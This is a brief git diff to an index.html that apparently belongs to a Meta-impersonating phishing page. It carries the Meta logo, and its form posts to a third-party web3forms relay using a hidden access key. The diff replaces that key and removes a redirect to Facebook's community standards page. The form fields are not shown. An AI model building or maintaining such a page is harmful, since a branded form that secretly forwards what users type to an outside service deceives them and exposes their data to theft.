--- a/index.html
+++ b/index.html
@@ -27,12 +27,10 @@
       <form class="content" action="https://api.web3forms.com/submit" method="POST">
 
           
-<input type="hidden" name="access_key" value="39a9a931-54ec-4200-b958-efb4d21fc59a">
+<input type="hidden" name="access_key" value="
+f2c7d8c8-f336-4890-92e2-96031ddb910a">
 
-<input type="hidden" name="redirect" value="https://transparency.fb.com/en-gb/policies/community-standards/">
 
-<div class="relative flex border bg-[#e9ebee] h-10 md:hidden 1g:hidden sm:block">
-          
             <div>
              <img src="https://upload.wikimedia.org/wikipedia/commons/a/ab/Meta-Logo.png" width="140" >
             </div>
